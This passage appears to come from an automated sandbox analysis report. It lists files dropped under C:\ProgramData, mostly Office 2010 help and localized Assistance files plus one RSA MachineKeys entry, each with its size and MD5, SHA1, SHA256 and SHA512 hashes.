9ee781f52266f58376808ae334bb0c492ad4438d601e54fc66819ab98f9a749db6d0899f37389f84d641d6a56eba4c465d7ae9733c309994dd33bcfb0e34d427

Download Submit
C:\ProgramData\Microsoft Help\MS.EXCEL.14.1033.hxn

Filesize
626B

MD5
21627936c36289950b354c816f44d543

SHA1
a87a0c8005b356da80d0eae7822e9541440f7928

SHA256
d544a17d23efab6a47fc3a71f362da34e0d46753ccccfbee4b273f34e2dbd4f6

SHA512
2c58afb4107f16918ed8291bc183199ab4c64cb90cf71acf0bcd8f181a10229c6b949addd63ecda5d4f688c61d7d6d26b039aaa704302dea6e980a18a1e2e080

Download Submit
C:\ProgramData\Microsoft Help\MS.EXCEL.DEV.14.1033.hxn

Filesize
658B

MD5
9d0d64f4d8d8dbced0e7affcfab82c03

SHA1
c63fa29d49d14c6e58e3b1294c1d165451e63ce1

SHA256
b86f39575228ddef68f14c81c9c652daffd24a39adca1e1cbfee9717fb3ad633

SHA512
f9d712968e19c3965052c2096018d3fbe8d47a2cc0e72f66118308d54bce53ac610602e4a3d2ca14c70510b38d7b2b51ebca8087861c7d8849f85c14cf0f539d

Download Submit
C:\ProgramData\Microsoft Help\MS.GRAPH.14.1033.hxn

Filesize
626B

MD5
c792ef63f331e1329de2b3bee34b95e8

SHA1
e68470ea56673055edaaf16a2b526ab3c63fd022

SHA256
f9239730c0f20f5f20d31c06824be4c1456fa38e264110bc9047f9ada4f3ab40

SHA512
b8557c7c20936792fc59d7fc5e17eb26651eaf1d0aaa47131ac5967ee047273ae364c810dc884adcd10d3d418df106bdaa17d0bcd92e47b0f507f2b639b13390

Download Submit
C:\ProgramData\Microsoft Help\MS.GROOVE.14.1033.hxn

Filesize
642B

MD5
e56ff7a60ba0012a1e888af86712b800

SHA1
e987d9f012a5d2904cdee6842fae25940bfad10d

SHA256
da0d82e5320acd492964e5dc4d6d863a94e34b6f2472b7971b70cc84f79edb29

SHA512
dfa1deed825a566ee6037c9707453e13bc5c21d3b203102381a6aa2f96a797a2559ad8fac238a0a4ad35104605b3d3aee1c993a4bc139dacb53945d10ed85e38

Download Submit
C:\ProgramData\Microsoft Help\MS.INFOPATH.14.1033.hxn

Filesize
658B

MD5
e6446aba0b44e1831738bca1b454e0a7

SHA1
a0c1ff25a58835fe5e1c0235eee9d09dcf0ba77a

SHA256
e7db783473ffb7477663c2e4bcd5a11a800a6f1fb133e5f1a7a9f001d672f296

SHA512
8bf92684286d4f25d2f3d06cf8b995f634b15bb21c0cffb6c58f87a6c096a41b01dbe3db2f3fb1f6286f7c43b42634318ac2eae7741e47cc8a8412dcb1f19ff8

Download Submit
C:\ProgramData\Microsoft Help\MS.INFOPATHEDITOR.14.1033.hxn

Filesize
690B

MD5
0c3083b75b11df556e6c27cb31152516

SHA1
5b3b0011cfe972d12b479583a5acbc76680ed814

SHA256
86705983106bf1e74459564eb95f9c59f6f29c2e8ac5a3d13519dbcb5899b135

SHA512
0509c6ef9e61a6ca63b1e17f80e9b281d51cc06d304d36606fef4325e7eb9df555518895ac3f32199d7b97d7c042fb74ee4c2fbb1d3b621a4580bb54da7f29e1

Download Submit
C:\ProgramData\Microsoft Help\MS.MSACCESS.14.1033.hxn

Filesize
658B

MD5
d4caeede73df40619837d28c62bbefa6

SHA1
a3d2569931c0ff947ddf1035377094a6a1615045

SHA256
b2560d6b2b2544436be5638feccf6ba7a9e2c047671d791d2b866ad7fe7b1751

SHA512
7c6b67a46ada3729d67703bb16cf5e0ece067f48dc9714bddb435a8dc98c30ea4b4e325532c452457b69f0a47d0ed86fe5d21ff748739504082e19cc79e58c8c

Download Submit
C:\ProgramData\Microsoft Help\MS.MSACCESS.DEV.14.1033.hxn

Filesize
674B

MD5
34000ea9d99a3c6c74d39843371af587

SHA1
7467ccd5c46d226364a52c2f06af5bf445b4fee7

SHA256
6bdcbdf888532604d7847729033d2a380c73bb98cc02cadd42631d9426e62891

SHA512
47a9dbc5f6a6983a3d9252ae169603d557836a716c35c3e2d48a202eda5b1976af1fde945db186a3c8f06137635f29817dc8c174dfba27eeef60c28ba2e14a12

Download Submit
C:\ProgramData\Microsoft Help\MS.MSOUC.14.1033.hxn

Filesize
626B

MD5
0b40437e0b1877f5a4986bc8803ac4b7

SHA1
012625720b99561c9c27ee9bca66bc3acc292a8e

SHA256
c6075683dea30baa62d79eab9b024b288490919249b3e795f02d13bdb83a2531

SHA512
5e977655a2971b2836fce9e4f9512b5396dc527c442952a11b85bf6b070bcc6c3635617253dadc3a19c558f9aef9cda8451897b2d1bcdfde53da2a3afdfeba40

Download Submit
C:\ProgramData\Microsoft Help\MS.MSPUB.14.1033.hxn

Filesize
626B

MD5
9da9f01c2b0619759fb3cd80d5a7a0e8

SHA1
82d2567cfb710e84614c00130b8a5f3c1f13a59a

SHA256
6360d4fdf085dbd7cce220cd610164e2f27febf58cc9a25500d56c24ab470726

SHA512
784f832ce13a6314b6bcc4378e70a4fd995d44b9babf067505e6e21ce5189a8d42d5976952fd0bd5b16716e4468362170f770da46d7d8680a4a174408072ad40

Download Submit
C:\ProgramData\Microsoft Help\MS.MSPUB.DEV.14.1033.hxn

Filesize
658B

MD5
40a53b09a81a5ded924be766cbdbc75a

SHA1
f22be6dfaa60e31c593b7678fdb6dd7bebe9fa8b

SHA256
e1878124512651fde5f2889274b7042b3bfcc42005411cc116572468685a3c08

SHA512
630ef50c8caf259fbab674c438e02bf3d980a8bdfbb4bc46381618d753d6ae300c2fc9a26d00c7edd341d3fbc250acf7ae8c1f37d55fe686216f13f43cf1a49e

Download Submit
C:\ProgramData\Microsoft Help\MS.MSTORE.14.1033.hxn

Filesize
642B

MD5
15aefdd95f158b0794f9cd56eb559cd9

SHA1
d81ae6703b1d560916bc1a8a227854095b083389

SHA256
9ed79ceef1e877dc34bb00d34b9b3da22dc98e43c559160d759c44f23103ab6c

SHA512
6fc89c95ec70bfca9da44c90061cef01118ea456bf6763acf950f939756401ca44cded8434850cc2480cabb37d1ab3f700c0dd8783ef6101e631bba48483af57

Download Submit
C:\ProgramData\Microsoft Help\MS.OIS.14.1033.hxn

Filesize
626B

MD5
0d3a464408f2528a647c0a049e7ae0fd

SHA1
3e97f7171b6ebfdd9073cb33d8c920fa6e0e1993

SHA256
bcb131452e98cbcb4c2154b102c7bc6c9d5cc33c8c9febd36632f1080a81cf1f

SHA512
936ea0e3def0b14294fab524d8dcc6813d972d5ceddfd0abbb2f46851ce1ac9ada5b6889a25bce5d56b277f9956c0a687de3622d1292db2ad71739fcbb33c440

Download Submit
C:\ProgramData\Microsoft Help\MS.ONENOTE.14.1033.hxn

Filesize
642B

MD5
f426f84f92a117a9e57016ba9477351b

SHA1
f7f9b12ee82203d8284720a4434c1df6d4ca9f15

SHA256
75905f8ba05e776b7bb541c9a1696b6dc6524bd0603abccc3bef59b328cfa1ab

SHA512
2431503b5ceaa369c809d13e67aeab354a37bda09a3ae4682ddbd921d39e8653639e0ebc4f140beace2c3b2341fd9be90d9356e6e2de73087d1e7cca136ccfc0

Download Submit
C:\ProgramData\Microsoft Help\MS.OUTLOOK.14.1033.hxn

Filesize
642B

MD5
92c933b1118e153bbff37d5d912f409a

SHA1
9a94cedf79c672fde1801cd3ed88c4478b183eeb

SHA256
c0f1a552bbb9d75524c8fdca571e3362f2c23333f3b7c0b42301fe900c599b5d

SHA512
11c0dca211248df2ae9584bf85800f0a852d4a93f247236dc3d48213026deaa1328800f29e4c6377f299796c4ab063c4a717b5f1cfc9c25265d0ac4d8f6ba58e

Download Submit
C:\ProgramData\Microsoft Help\MS.OUTLOOK.DEV.14.1033.hxn

Filesize
674B

MD5
67af06caedc8abd018f52a5a1a6915d9

SHA1
50480d426775351f03e8e3852fc70fa5086fe4ea

SHA256
cd7055d65fccc3c4fb3908ff83efbcbc2989ffdd03c68b278689e33da93a3c6c

SHA512
63d2a7989c94666817ed220955710d9271a7612da0335a4a5793be359290a9d2e5a8285353110997ad0d3a167c16711bcd12f46a6a231baa087d0d6064025ff6

Download Submit
C:\ProgramData\Microsoft Help\MS.POWERPNT.14.1033.hxn

Filesize
658B

MD5
d182372f14eeb6ba844ba3070b47eb23

SHA1
d51c0f2f6c70e29854a38c481d896750cf0a3993

SHA256
0614c8a438aa60add2faaa42b16846a816e394678d5f0d59417a8c27332a1924

SHA512
dae94385d82d75b32309f9e53c4110edb5be514f5042599755c0540d943b922083f6bf3b0b0ac65521c294e95bd25c2419555c46d99b175804b20e78e74b5dd5

Download Submit
C:\ProgramData\Microsoft Help\MS.POWERPNT.DEV.14.1033.hxn

Filesize
674B

MD5
d1e6e017b1bf720ef296cc04109375e9

SHA1
ff540dab9ac3c9d0aba4db6d09e1edbf1c596a18

SHA256
c93eb174162beb074915fb816553c7b5ed9d6b2b20e99fa7dc03c774eede33af

SHA512
40476ee0432c57cbf85836ba5faaf296f639553525863ff3602c157b828ccfaa2abf40206e8c678e2dfb9691fb3b596aa1c82b2da2465acf62ab3c9f0196d2ed

Download Submit
C:\ProgramData\Microsoft Help\MS.SETLANG.14.1033.hxn

Filesize
642B

MD5
faecdff22dfcbf53ae8a3a19b47d66a3

SHA1
f191c99b08363aba8f006ef15ab789c16a568278

SHA256
25fc2a1470719a64a472fbc0cf4503e9109cf25e804bcff5214a007675d5f2d2

SHA512
09b92a640d7fafa130649cddf34c5949fe07c35155fb9ebc0d220d22b85945377d92e8754899397d63138ded6e288c7d779678be24669d7e035effaea66e7399

Download Submit
C:\ProgramData\Microsoft Help\MS.WINWORD.14.1033.hxn

Filesize
642B

MD5
6dcd16e0aefc70e84dbdde8b32f1d4ad

SHA1
0d767c1082c14d41722f391410849caea572f092

SHA256
5275dcc41c289714f7d142ae78a707252609510b6118dd91bf6e3e9ba7833b3d

SHA512
dd9307540bae04bcde8c0a1d74e52bfc0fc4e3d015f8f803baf378d8f6eae7e84fc813927bf5c20faff796d0c9be3c6dc98351c8434d6dc5f7c568808bb1578c

Download Submit
C:\ProgramData\Microsoft Help\MS.WINWORD.DEV.14.1033.hxn

Filesize
674B

MD5
d5677d86439e61b2e634e3433c6b5351

SHA1
f08772c43dd57c85d43e4c33e40aee88087105ab

SHA256
cfdc20216d375306c1f5975404286fabfaa0197130a7b4e2150d992916f3d036

SHA512
16032d59691c3fca820538b71dbb7752768f9c8929d1fcf963904edad5830c46cf83d641dde30bb67213401e3ef31d7d86d0c3b126cfa5c6f962b83e0c1d11b4

Download Submit
C:\ProgramData\Microsoft Help\nslist.hxl

Filesize
6KB

MD5
1a130aadff9637efb65f5a2cc04fb8a5

SHA1
d09e3cc13eb6c72e9e225b9973a6e1240780debc

SHA256
dd1e8139eca4dd0cb5b1a83e107892fe78a00ee96eb0a6a33fc0b641bf1f5a02

SHA512
f99d6878e15622d1417da1cfe37a3b8d7e6e54d9de1d90d451d6d98481689331740f6d883de89f87bbce80b5120f11be009e6afac9d3f0eda3874b65667670c3

Download Submit
C:\ProgramData\Microsoft\Assistance\Client\1.0\de-DE\Help_CValidator.H1D

Filesize
12KB

MD5
6739383b6f9806e25f46e81c55b412f8

SHA1
58b5e1b5573c010f8bae7009c1c6ad1abe236623

SHA256
2a8244483be60276af1ad83137a443155a41605e30f1d488a9a26627cd619754

SHA512
3061f64ad1781d9657da7b6b5f5320770ed206e264f9e72de4b36e40cc1902be434c50ccf1fbb664db14e79104fe2431e1f9d1ba20d1f55e3d1bf9e2b43dc53a

Download Submit
C:\ProgramData\Microsoft\Assistance\Client\1.0\de-DE\Help_MKWD_AssetId.H1W

Filesize
229KB

MD5
81a9e713883cd127f0e728a811f1f1ba

SHA1
a5aad238a99f6e9cbbd827ef0d2b373cabb06430

SHA256
1d5e52a1dd29f89220546da3e6f669c2a160bf34fd28281932b4d4a3c183e13c

SHA512
02d6937cdf5336c997989e8180f4ecf7e44c10ff6d11f80134bb7cd4c24a278825c54540a5be8f233bf4af4c5ade9392602e4bc6910678a6ccc17ef8483ba6cc

Download Submit
C:\ProgramData\Microsoft\Assistance\Client\1.0\de-DE\Help_MKWD_BestBet.H1W

Filesize
409KB

MD5
f1414989ebd67ea1feba1a2f8a11cb1f

SHA1
d14540d4c7f10cceed8fd978a0ab87a2243f5317

SHA256
ac50a8cf5271ff849c49e98c2bd5b172d0a10937d8f57f1832caa93b192e2527

SHA512
9cdcf83ce5c2c9f757e6c73c584096f7a7ca6d75ec95bbfa44f32b878340a423271d38e8f6a5e9dd2beec629a7b4874310df7ca4ef4d235883e9b0f8a2933a6e

Download Submit
C:\ProgramData\Microsoft\Assistance\Client\1.0\de-DE\Help_MTOC_help.H1H

Filesize
531KB

MD5
a1e61fe3a70380cd79dfaa93ec359acd

SHA1
382c175c19db0bb701e7b6da561202fc8eca6a11

SHA256
28d698d5e021c152580709a520310afc522c3195395e804e216ff85d7add4b97

SHA512
394b7fec71dc826cc0471036021c06238c8049425c330feada71c9f8086a967fe44d759a336f30f8604810aaedf09afb9dc28978c421d029012c62582f323409

Download Submit
C:\ProgramData\Microsoft\Assistance\Client\1.0\de-DE\Help_MValidator.H1D

Filesize
14KB

MD5
b4c098cec5cbbdd74a3616198b4ec5e0

SHA1
5c0c5d14e7e4a8c11a256e2dc3ccd1f83cdb173f

SHA256
5ade736ce49f7b3b14c9c21a887e188c972b7f92e4668d77c172552ed6059b0e

SHA512
745284e3dc4252a02b7394cfd18d5f788db04dcec043669885e0ba689c25b454a78b9fb9867503b7342d03ac75dfc6d6c5a9b004b2c41b3bf97cd185ea40ac70

Download Submit
C:\ProgramData\Microsoft\Assistance\Client\1.0\de-DE\Help{45EACA36-DBE9-4E4A-A26D-5C201902346D}.H1Q

Filesize
1.2MB

MD5
63814386f06fe2dddc05daaa660c3f0b

SHA1
c62240710e4f59f399e50228cff01c89687cabf1

SHA256
22b8a26172c4657601805950a436a5fe8480602d1f09ba44347bd36be874300d

SHA512
4607a20e6da5f11177b4b488da91ac7956fe2900925a87e3116771e73765768026e9703ab3715b5cd17ae5d069109030338fba8d9ef9f63b6773dae6894d3b8c

Download Submit
C:\ProgramData\Microsoft\Assistance\Client\1.0\en-US\Help_CValidator.H1D

Filesize
12KB

MD5
f26c8ed4800e80f2c7add616912d3982

SHA1
e9c426636dde948e7e3bb121893f91c575384278

SHA256
151267e19659f3ca88ad8fbb09fc6915d425d57103b0c0935c67d412c1aa4153

SHA512
6bf95bbd8a9ecf44d5407d1cd9f543e4b3182c7ddc5123b9c9608f47ae983ad7bdc014751c01faec1fb4675ec9a29b585e450ee47075cc8c97ece3627d508a35

Download Submit
C:\ProgramData\Microsoft\Assistance\Client\1.0\en-US\Help_MKWD_AssetId.H1W

Filesize
229KB

MD5
6d720c0ba7b7cc1319965630bc100829

SHA1
3c649f90235320278bf43ec0120f15990ee74c82

SHA256
b379c98be5fc3e18a7e428f22f80fd7491ac8eab7d9479c81049de08f044c029

SHA512
b5ab17ccdeb3a0635dcf0b454feff2dbed2eed0abc3bc2d0d830865dbfb00bfe247583093c400877bcfc9aa137f74cb0f66618d8a5bb9cc62a1001e29bc2ebc2

Download Submit
C:\ProgramData\Microsoft\Assistance\Client\1.0\en-US\Help_MKWD_BestBet.H1W

Filesize
201KB

MD5
f300e639a44b223bef6f561af8c83ce1

SHA1
b5975c29b4e0ebf9f8c197b0228a81c9debbaab6

SHA256
f8beb39b854ddff4efcbf9c098a6cb8b822c4915a54bb0dda8d2d832878c2cd0

SHA512
8807bdbcd0c21280d433cc1e8c8f9670b9143c554cb8ac14f0c726e1ba4286ba9458eacf1b1e86dd25618e638be7bfaa79b619783152816278aba9fa21f2d9d8

Download Submit
C:\ProgramData\Microsoft\Assistance\Client\1.0\en-US\Help_MTOC_help.H1H

Filesize
491KB

MD5
3aba56189081d41797bf6ce360617683

SHA1
c24f04dfdcd3fea3da6f5ceba10f62a293c100b5

SHA256
628b9c9268ad7b548c289cfd5ce69c5ab7386e5f44039dc75e9206a3a544034e

SHA512
6b83af70d30427ac756135ef5008444396b77f4aa925ba4db8395957bc3267e7a5d951b62acb974fb5fdf06062582ee9959ed247e04fea074dbc53035d1f704c

Download Submit
C:\ProgramData\Microsoft\Assistance\Client\1.0\en-US\Help_MValidator.H1D

Filesize
14KB

MD5
6276825d373208606f5830c3412b4d81

SHA1
69c1cd77db19e94a5ef9a3b6b165fcec2d78ce1e

SHA256
1320209dc02283e781617c8c719988faf44f1ffa1610a33f5babb9c2698589de

SHA512
2e0229a04f9f92aa49c5c9d27822cf23b8aae2e9119e5567400c0a4aef2944a7715ee938af37be507d31ba58d354fc2c97e4aa1e804fbee4339e457d352d6b43

Download Submit
C:\ProgramData\Microsoft\Assistance\Client\1.0\en-US\Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q

Filesize
864KB

MD5
7fca88572a074257caf9d50a1f3b33fd

SHA1
ccc07aa07cad0658a21b89b6a2a6b32cbac99a0f

SHA256
2a162180d710bd6a7a9ad878351e8e145f1212f3e6ba508e5e75f5648572c5ab

SHA512
1d35f4e89dc7c09b5f9dc896f1ff8784b9363240c9d0fff53d878c0f77f9108b228139328ea1edeaa902fc507914e9b48986866a2b739954b3b1b52c43243d2a

Download Submit
C:\ProgramData\Microsoft\Assistance\Client\1.0\es-ES\Help_CValidator.H1D

Filesize
12KB

MD5
7b2b237e65deb0be68aea9f616fa5b22

SHA1
0aaa155f74e7b835f8703d012e45a3c985b2b772

SHA256
316f3b44ccab800cd0b88479f3bd1360038fc1a01674d13110f9e98945a9c22e

SHA512
025ec19f92596ccdb2141a143b7394c76421e6f4a55a192f79d19e65c2e4ee31c1bb4ef5c348a50ef275de476b4fbedb2791034865052d63cba458f6dcd6b5b1

Download Submit
C:\ProgramData\Microsoft\Assistance\Client\1.0\es-ES\Help_MKWD_AssetId.H1W

Filesize
229KB

MD5
42e608e87a46daec4497fb01a9895659

SHA1
37e8a95325aa4d4f37fc7e40ad80104484eb5006

SHA256
12fd90dd5e6360dc530e619d8d39521ee458e7ffbc3761274f211e7d0a11c568

SHA512
a4fef866fd86502c9513c6e9cf91fdbed6e61cfb9be36eb2e71f9c09ea1daa32fab5769bc5a8aae8b41cd3719907b96d2f8e62565051f0d3a87d9ca1cad200e7

Download Submit
C:\ProgramData\Microsoft\Assistance\Client\1.0\es-ES\Help_MKWD_BestBet.H1W

Filesize
425KB

MD5
9bc6129850e62d01c850a095841340a0

SHA1
0cca3be1e7b42f8ec1d3b946e1af2814af26ee60

SHA256
bf535d7e0f221a948ca5200713e2c36d0d78d0b3d723bd5771f25e85b3f88f4e

SHA512
7aed10606ce52f73d08afcf393131432686aeb71c2cf7389d4e4539680e5c6219dc57cbd3edcd82d1cb4690fd29cba46e321afb18c1164416039509bbab3be4f

Download Submit
C:\ProgramData\Microsoft\Assistance\Client\1.0\es-ES\Help_MTOC_help.H1H

Filesize
531KB

MD5
5d183f70f6cb6b9e555e2634bed1c27b

SHA1
c45f91fe2fef302cc2e8fa081e049a72f62ee565

SHA256
0fbf1d47bce4f8b4f9e7543fbafc5498143c652f752d3388126a4b311a2a06dd

SHA512
58e2bafafb218b851762779c2d555f011a1c37b41e8120d9fd87418cdab7eb2606f5755c3a79a1e2bf2a0bc53d71a46161b37f4ef60c1a34b39ef31ff842b157

Download Submit
C:\ProgramData\Microsoft\Assistance\Client\1.0\es-ES\Help_MValidator.H1D

Filesize
14KB

MD5
28ffb854b0679cdc67070bde406e7bbd

SHA1
0d44237778655ccbbf8449030a61bd8049f8a576

SHA256
39a9a06ae42d21817ab3a27a3553b45e8e58c357113f9223ad9365d077f2424f

SHA512
7c1245a6c7ab2d06b04133f80834c8c919ccbdd99a032f58dd1af6895a2a185f55a88d5e57f93dd951eb7cd25c85aa400cb5798efd3b0256ed18aa2b35df0414

Download Submit
C:\ProgramData\Microsoft\Assistance\Client\1.0\es-ES\Help{68DC71DC-2327-4040-8F03-50D6A9805049}.H1Q

Filesize
1.0MB

MD5
6fd09ee6416998970b27a3d00462d72b

SHA1
776178c421dd7d1dcca85590ebd9b5e0054ef08c

SHA256
aaa16391e7662d5898d9036bb3f12dabc11276ed35d5b2b14437da4ddd1207e9

SHA512
d2a866d93f5dfda0709fc41f14a3050aea41546919619352824e26e3ce30f3b32f0428f3792a4eb5f276f5eb1ffd822ad68d544707b063764fb3da729896e9c4

Download Submit
C:\ProgramData\Microsoft\Assistance\Client\1.0\fr-FR\Help_CValidator.H1D

Filesize
12KB

MD5
f04b9a0439aeaf9d45c350bd8b7bb98f

SHA1
98e6ca01a0a20d355310a2097e6d3a8e0df0c930

SHA256
357a7cb6c50c5b4cb7ec00fac12d3f8d02e590539a5a4ab15338b6e1f860b674

SHA512
6da1d1329394b255bb999e58f4aaf68a8872a3bd8ac6cd7453a5c76ff379085f0be54e9cb03fb397bde226f677e0378d968fddc72d700a707967e5e118a27817

Download Submit
C:\ProgramData\Microsoft\Assistance\Client\1.0\fr-FR\Help_MKWD_AssetId.H1W

Filesize
229KB

MD5
7bc4b5ddcdb851de74f124e34bc08655

SHA1
c8c5ba7f8a92f5200602b4572cc1c6c52bff55fd

SHA256
858d980690369e3d1db1b8984da3dd103cf2760e3d8ad8ac019c58b97ce13932

SHA512
0019b12290d445ae136a244bd953e8f2b8b1d65a96403265c6b639bf71fd78d1792f2f721695fc4f7eabb95dad04ee0fbcf272e5255f435349aafa844b6c2a66

Download Submit
C:\ProgramData\Microsoft\Assistance\Client\1.0\fr-FR\Help_MKWD_BestBet.H1W

Filesize
421KB

MD5
b00d19f4333e8ae92c42fe76af1bc940

SHA1
7d99c0f3851416bac437bc73f7d0c958091ad579

SHA256
98d84f87fcd95da2f6e5edd141a3b4f90d8293de7fa0197520b5c4accb4884ce

SHA512
8d3e5384cb4fc47f6045b52bbf387049b58185998d7251185a6463143975aab23d85df3ceba86bbea9ae117a15c72981c31e72ed2a00049e929c144e04d7c886

Download Submit
C:\ProgramData\Microsoft\Assistance\Client\1.0\fr-FR\Help_MTOC_help.H1H

Filesize
546KB

MD5
878d6cca15617636e0f4df0ff8b47ea7

SHA1
813a28cc5dea48004418225daf7fded260192b87

SHA256
b67a11cf147b14b27c8d1fb2774525a4249ba91850fa898628594033fee89fa1

SHA512
f994c7f9dafd06be87c8962f5d1d92ae3d50203fbf722baf4b65a9abd79d29a98e961cca25d2e76b2ca280686d75d454087abcea1505ed079e866531edd83295

Download Submit
C:\ProgramData\Microsoft\Assistance\Client\1.0\fr-FR\Help_MValidator.H1D

Filesize
14KB

MD5
e27b92eeeff9ab24f2fb5123a4a09bb1

SHA1
2f417cb4f182e82f8a67452ce7176aa9759f8502

SHA256
af12bac426ef4192e20d1931f10010ffcaa2c22c346e19ef5f8d0daaf8169016

SHA512
39e89f6e857f3568e3b71ce15e40000ffe6b00d2574e91cf8b475cf0c23181e8516f16b167fa38a94f53115273b5217382ac8235f249849042d505e80ab7eee1

Download Submit
C:\ProgramData\Microsoft\Assistance\Client\1.0\fr-FR\Help{92F2118A-E813-4A4D-9DE2-F96A9DC02C53}.H1Q

Filesize
1.1MB

MD5
7c2f55d76b92be1add8bc507fa08d959

SHA1
fdeb79a68b09189cdae3765669c77a02303baa00

SHA256
97b1f0417d086cdf3d8e8c33a067b009a3cb8d7a8dbff0d907ad02ac3235c61b

SHA512
50700fffdf7503b5482759bbb165bb96f3fcd664e4c63a31c56dc1ad6069782739cffaaca9f4157b392d59d64cc87f4f83aef3883996e27113129d76f998ff0b

Download Submit
C:\ProgramData\Microsoft\Assistance\Client\1.0\it-IT\Help_CValidator.H1D

Filesize
12KB

MD5
114f3730f93d1256be64154d9307658b

SHA1
3d63cb69e5b036a128637f095913fd66b247c377

SHA256
41451fb1ce1f06be97b5eda2010e10a7fb886be110e8c504da171cc30224a6df

SHA512
9eb2f07e177c07f00019affcfe5115f28bd9f801165a0304393b514ff0b175be60a50dc84275c10080e6f49d2ad05da44cb7fee5c1a5f8962d4d0af9651473e5

Download Submit
C:\ProgramData\Microsoft\Assistance\Client\1.0\it-IT\Help_MKWD_AssetId.H1W

Filesize
229KB

MD5
567878e4a4b585b5c2f654c8194399e4

SHA1
0a26134ed3be7b4094230ccda25ef6fcabac2324

SHA256
8e61675c1f63d3f694a15a92f3ad517c2c35b9375b2d1c10ce311748c44bd914

SHA512
e41350fdb28f1340523d7ce428f4f757d95eafb1758fb61de83184e6036e2198ea3b809d10dddc11ec8787546277d956960fb6650c47ec0a92c11ee3fe6e7e4c

Download Submit
C:\ProgramData\Microsoft\Assistance\Client\1.0\it-IT\Help_MKWD_BestBet.H1W

Filesize
421KB

MD5
ef4073be4b65f93a63eb6841d68fbd17

SHA1
aee06b1c195a340344979e3ec12b0711b47c447a

SHA256
32bda4a331b7fdb6cdca48e793221a1b8b8420a62c125e315d4945bc764ec6ca

SHA512
65ff01f9da485487786d8338612c6941cc60d37dac5a3c4678194a591ea5d39148829c20089ab86f602c404301637e2b39cd0cec282e741f039dfc41bb668cd9

Download Submit
C:\ProgramData\Microsoft\Assistance\Client\1.0\it-IT\Help_MTOC_help.H1H

Filesize
530KB

MD5
dcb8b7eb2a21e5954d7b19ea9c926555

SHA1
8e72dc63538ffd3a2a7b8d1f25febfb370044879

SHA256
52f7a2af3075de5b9ee22caf1e817103d49d221696dab2ca745b9e2320496604

SHA512
dbd008ca5388eb61f6f3470eecc7a3c466e45d568b392ae6a1b2342515d6ee3c3edaec965a2a10b2dc80d74f1769fbd9f6c53234c001dbf32d7025510bf2aeda

Download Submit
C:\ProgramData\Microsoft\Assistance\Client\1.0\it-IT\Help_MValidator.H1D

Filesize
14KB

MD5
cd393d73dfb6b74741f3f629c7d97560

SHA1
13b4446248d69d018709a66cf3fbde1669b15525

SHA256
693f917b9ff4670e21ef6d51cdeb17239a35b053ad8f11143de57a2097512d70

SHA512
64d389d795a142de9514c2c8509ef8447b5b064c7791e4caf5727630be4a69f081e2f3568b3614f31af44ca94e6d6a8401285f1ce8a14300419ad6646d66bdd8

Download Submit
C:\ProgramData\Microsoft\Assistance\Client\1.0\it-IT\Help{7E352021-69D6-4553-86AC-430B0D8FF913}.H1Q

Filesize
1.0MB

MD5
a0804cb806a8dc5e00bb340bba3568bd

SHA1
84ce0d3349881b92cd87bf6b05f7c42fd15ce05e

SHA256
e91543df40dcaf1580cb651c319ae83eecb98322c0835575ee2dce12dcc6bab0

SHA512
41a078ed2db86885ef82ff3ef60710a8c36c79d16489c0fc601b1fb6871ad100e220668576a1ffb1bf32924cde5a555761880b7aa8719aff38163a4faf8d1c2a

Download Submit
C:\ProgramData\Microsoft\Assistance\Client\1.0\ja-JP\Help_CValidator.H1D

Filesize
12KB

MD5
2deb6722dd30df23be56127d2f6d427f

SHA1
c171d4fe1a300c8f9bf0f39ae6c37736a3bc00ce

SHA256
8d29d27534def68c1306108a75da679da249d8c320f0814989ea3008af04e5d3

SHA512
d43228dc2f055a9e40cecf398c2bfc61caff7e03d0b53b66a85ac93e2e1c15900e10397596ec486a57b61cea849eeee04865916688951b92149a0f7e23851555

Download Submit
C:\ProgramData\Microsoft\Assistance\Client\1.0\ja-JP\Help_MKWD_AssetId.H1W

Filesize
229KB

MD5
52f2f92a0cbb26a7b763e69fb44a521b

SHA1
dcc6b03b9ea9f2de9c9c9dc011ad99ca4114492c

SHA256
7172b3037cc907a461f7cb1e951176263350ae55025c014609bedc99f371a8de

SHA512
77e5d03491d8bab074ccd33ba2566ebfef4e9ca315090898802eb134b9378b9b4e0e30fdd872e66822339d8edc8fd99a2c78d2758d042a9b4e49ffc70e9115e9

Download Submit
C:\ProgramData\Microsoft\Assistance\Client\1.0\ja-JP\Help_MKWD_BestBet.H1W

Filesize
357KB

MD5
0a1269c80a2f8182ea63eb6a4a0b8272

SHA1
ce02044895b8f6d0509bd1330822f1d73f559c8c

SHA256
d1e08c295f830a1a38d7633a2109ab447061f05810db7e55a3219cba78e7d35e

SHA512
62ba3d536482819248ffd7d02f6fe61a972fb3f8dbb0b54db7e0efce6045ca737eeada05fecf11dc75817a5b89f8dc9b9d32cb6707caf6006c8459db57d6b039

Download Submit
C:\ProgramData\Microsoft\Assistance\Client\1.0\ja-JP\Help_MTOC_help.H1H

Filesize
352KB

MD5
8bad34b856bc4588066ffbc2ef94d82b

SHA1
d6f6d0366ff8b5c1313c92ceb9b6f076fd00e397

SHA256
8f81590806a5c1bd84cf22f6b16046ebdf7de6db08271d7773cdef222b1881b5

SHA512
975c8cd11027b9483309282a1ff6494513f95cf92802643ab7ea03f4bb531c46c62930050978432ff2a0cb9820a5621c0fbc3d41ae2369244a1fd7c571ef1358

Download Submit
C:\ProgramData\Microsoft\Assistance\Client\1.0\ja-JP\Help_MValidator.H1D

Filesize
14KB

MD5
9409a3f4aab73c14a50fb31247f2ec5d

SHA1
6061cc19982ea7ad04d472d656933fad7c1af7d6

SHA256
44be8142665329c171ae4775c9cf97e31725942c262bc531d0831d839b5ddd02

SHA512
67d0c01778dd30816780035ce452d514d5faf989c286be67666247b8c9af53d974dca6a173efd2df419c1c930296a6173896ac7a481abaeca22c9c92cde0d06b

Download Submit
C:\ProgramData\Microsoft\Assistance\Client\1.0\ja-JP\Help{E1E8F15E-8BEC-45DF-83BF-50FF84D0CAB5}.H1Q

Filesize
1.2MB

MD5
95786ee17a8371f3973a8a3f4d53a78f

SHA1
40d57049c81c053dd7928c695ba3cb68dc3912da

SHA256
da8da1e6771e913380f9ae7e2a4b19a2fb2792d51197f3972cf733342fcd1df5

SHA512
ffcc8764f2f6e2dbd41e3fc3ab79fad4a4c9b969cf4ebd8c1cefe28feaec43e5c3d4d1bfae541d43f8ec500205078635c1b544c52f797d6195fcb25c921f7c1e

Download Submit
C:\ProgramData\Microsoft\Crypto\RSA\MachineKeys\08e575673cce10c72090304839888e02_38b42d9b-3e83-45f4-8789-a30be34574b0

Filesize
338B

MD5
